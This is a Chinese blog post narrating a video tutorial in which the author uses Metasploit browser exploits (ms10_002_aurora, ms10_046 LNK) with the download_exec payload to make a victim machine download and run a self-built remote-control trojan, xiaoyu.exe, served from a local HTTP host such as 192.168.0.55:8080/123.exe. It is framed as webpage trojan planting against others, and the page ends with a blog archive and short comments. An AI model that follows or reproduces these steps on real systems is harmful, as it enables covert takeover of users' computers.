Metasploit中windows/browser/ms10_002_aurora利用
在线观看地址:http://www.9170.org/http.htm
=========================================
首先我们打开Metasploit
启动有点慢,我们先配置好远控的服务端。
好了,xiaoyu.exe是我们的服务端。
等下溢出成功要给他自己下载运行的,架设一个http的下载
改一下端口。
好了。开始了!show exploits查看一下有哪些漏洞可以来利用!由于是网页挂马来溢出攻击,所以要找browser的
windows/browser/ms10_002_aurora normal Internet Explorer "Aurora" Memory Corruption
windows/browser/ms10_018_ie_behaviors good Internet Explorer DHTML Behaviors Use After Free
windows/browser/ms10_018_ie_tabular_activex good Internet Explorer Tabular Data Control ActiveX Memory Corruption
windows/browser/ms10_022_ie_vbscript_winhlp32 great Internet Explorer Winhlp32.exe MsgBox Code Execution
windows/browser/ms10_042_helpctr_xss_cmd_exec excellent Microsoft Help Center XSS and Command Execution
windows/browser/ms10_046_shortcut_icon_dllloader excellent Microsoft Windows Shell LNK Code Execution
windows/browser/msvidctl_mpeg2 normal Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
这些都是最近爆的漏洞,拿来利用比较好。
我这个教程就选用windows/browser/ms10_046_shortcut_icon_dllloader
这个是快捷方式的漏洞。。。这个漏洞的说明可以去百度查找的
===============================================
show payloads查看一下,这些都是payload,配合挂马的话
windows/download_exec normal Windows Executable Download and Execute
就用这个,下载的
这个URL填写我们本地架设的这个。
好了,exploit,漏洞开始利用了![*] Server started.
我们在虚拟机打开看看!晕了,没成功,以前反弹过了,换个溢出漏洞试试
192.168.0.55:8080/123.exe
原来如此。。。这个URL我刚才填错了IP地址
还是重新打开用那个漏洞。。起了冲突
metasploit很好,但就是安装,启动,太慢了!
浪费了很多时间。。。。。。。。。。。。。。
我发誓以后再也不用这个漏洞了!!!
用这个windows/browser/ms10_002_aurora
再来演示一次
10:24:10 192.168.6.12:1058 完成下载 - 740.00 KB @ 1348
溢出成功!!呵呵
教程到此结束,谢谢大家观看!
=========================================================
标签: metasploit ms10_046_shortcut_icon_dllloader ms10_002_aurora windows/download_exec
评论:
Sort
Archive
- 2023年1月(1)
- 2019年4月(1)
- 2018年12月(2)
- 2014年9月(1)
- 2014年7月(1)
- 2014年5月(4)
- 2013年4月(10)
- 2013年3月(2)
- 2012年11月(10)
- 2012年10月(2)
- 2012年9月(2)
- 2012年8月(9)
- 2012年7月(1)
- 2012年6月(4)
- 2012年5月(4)
- 2012年4月(11)
- 2012年3月(11)
- 2012年1月(16)
- 2011年12月(6)
- 2011年11月(8)
- 2011年10月(8)
- 2011年9月(3)
- 2011年8月(6)
- 2011年7月(3)
- 2011年6月(5)
- 2011年5月(10)
- 2011年4月(4)
- 2011年3月(4)
- 2011年2月(7)
- 2011年1月(16)
- 2010年12月(9)
- 2010年11月(29)
- 2010年10月(14)
- 2010年9月(15)
- 2010年8月(16)
- 2010年7月(22)
- 2010年6月(19)
- 2010年5月(27)
- 2010年4月(21)
- 2010年3月(24)
- 2010年2月(9)
Comment
- Lightning_bear
失效了 - admin
在哪下载? - 王健宇
@红河:CMD命令里... - 红河
台式机安装了蓝牙。但... - M2nT1ger
@LiveOnLov... - LiveOnLove
可以将Tablet ... - 阿生
表示支持了 - M2nT1ger
@无:每种都学啊。 - 无
向您这么厉害,得学习... - M2nT1ger
@被屏蔽的昵称:谢谢...
2012-03-17 21:21
这两句话什么意思呢?